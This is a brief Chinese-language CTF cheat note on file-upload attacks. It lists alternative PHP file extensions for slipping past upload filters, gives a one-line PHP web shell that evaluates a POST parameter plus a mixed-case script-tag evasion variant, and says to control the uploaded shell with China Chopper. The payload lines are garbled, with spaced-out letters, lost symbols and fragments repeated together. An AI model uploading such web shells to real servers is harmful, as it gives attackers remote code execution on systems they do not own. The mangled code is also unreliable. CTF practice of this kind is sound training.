CTF--文件上传

.php上传被过滤时可以用的别名:php2, php3, php4, php5, phps, pht, phtm, phtml

可以上传的.php文件思路
(1)一句话木马:
eval( P O S T [ ′ a ′ ] ) ; ? > ( 2 ) 绕 过 过 滤 方 式 1 : < s c r i p t l a n g u a g e = " p H p " > @ e v a l ( _POST['a']); ?> (2)绕过过滤方式1: <script language="pHp">@eval( POST[a]);?>(2)1<scriptlanguage="pHp">@eval(_POST[‘a’])

上传完后使用中国菜刀连接

你可能感兴趣的:(CTF,Web)